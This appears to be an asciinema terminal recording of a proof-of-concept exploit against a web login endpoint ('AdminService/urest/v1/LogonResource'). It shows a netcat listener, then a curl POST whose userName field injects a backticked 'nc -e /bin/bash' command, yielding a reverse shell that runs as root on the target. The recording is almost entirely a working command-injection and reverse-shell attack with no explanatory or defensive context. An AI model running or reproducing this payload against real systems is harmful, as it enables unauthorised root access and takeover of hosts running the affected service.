{"version": 2, "width": 191, "height": 53, "timestamp": 1588935094, "env": {"SHELL": "/bin/bash", "TERM": "screen"}}
[0.051273, "o", "\u001b[01;32mpwner@pwned\u001b[00m:\u001b[01;34m~\u001b[00m$ "]
[2.536564, "o", "n"]
[2.614515, "o", "c"]
[2.69539, "o", " "]
[2.834447, "o", "-"]
[3.063873, "o", "l"]
[3.316096, "o", "v"]
[5.026893, "o", "n"]
[5.559613, "o", "p"]
[5.750199, "o", " "]
[6.092, "o", "4"]
[6.245733, "o", "4"]
[6.408612, "o", "4"]
[6.848111, "o", "4"]
[7.181428, "o", "\r\n"]
[7.183757, "o", "Listening on 0.0.0.0 4444\r\n"]
[8.722313, "o", "^Z"]
[8.722659, "o", "\r\n"]
[8.722912, "o", "[1]+  Stopped                 nc -lvnp 4444\r\n\u001b[01;32mpwner@pwned\u001b[00m:\u001b[01;34m~\u001b[00m$ "]
[10.260276, "o", "curl -i -s -k -X $'POST' \\\r\n"]
[10.260611, "o", "> "]
[10.260894, "o", "    -H $'Host: 10.10.10.123:21412' -H $'Content-Type: application/json' -H $'Content-Length: 76' \\\r\n> "]
[10.26154, "o", "    --data-binary $'{\\\"userName\\\":\\\"owned `nc -e /bin/bash 10.10.10.1 4444`\\\",\\\"credential\\\":\\\"whatever\\\"}' \\\r\n"]
[10.261658, "o", "> "]
[10.262012, "o", "    $'https://10.10.10.123:21412/AdminService/urest/v1/LogonResource'"]
[16.729727, "o", "\r\n"]
[19.011894, "o", "^C"]
[19.013256, "o", "\r\n"]
[19.013494, "o", "\u001b[01;32mpwner@pwned\u001b[00m:\u001b[01;34m~\u001b[00m$ "]
[19.50137, "o", "f"]
[19.673301, "o", "g"]
[20.033051, "o", "\r\n"]
[20.03315, "o", "nc -lvnp 4444\r\n"]
[20.033388, "o", "Connection received on 10.10.10.123 36782\r\n"]
[21.440394, "o", "w"]
[21.52937, "o", "h"]
[21.677689, "o", "o"]
[21.760873, "o", "a"]
[21.857727, "o", "m"]
[22.003623, "o", "i"]
[22.591447, "o", "\r\n"]
[22.596918, "o", "root\r\n"]
[23.019711, "o", "i"]
[23.09807, "o", "d"]
[23.328575, "o", "\r\n"]
[23.3356, "o", "uid=0(root) gid=0(root) groups=0(root)\r\n"]
[23.974328, "o", "u"]
[24.125735, "o", "n"]
[24.189592, "o", "a"]
[24.295852, "o", "m"]
[24.368084, "o", "e"]
[24.424854, "o", " "]
[24.590274, "o", "-"]
[24.688938, "o", "a"]
[24.834647, "o", "\r\n"]
[24.838981, "o", "Linux 10.10.10.123 3.10.0-1062.18.1.el7.x86_64 #1 SMP Tue Mar 17 23:49:17 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux\r\n"]
[26.246677, "o", "^C"]
[26.247166, "o", "\r\n"]
[26.247274, "o", "\u001b[01;32mpwner@pwned\u001b[00m:\u001b[01;34m~\u001b[00m$ "]
[26.688515, "o", "e"]
[26.851087, "o", "x"]
[26.968961, "o", "i"]
[27.119401, "o", "t"]
[27.28557, "o", "\r\n"]
[27.285677, "o", "exit\r\n"]
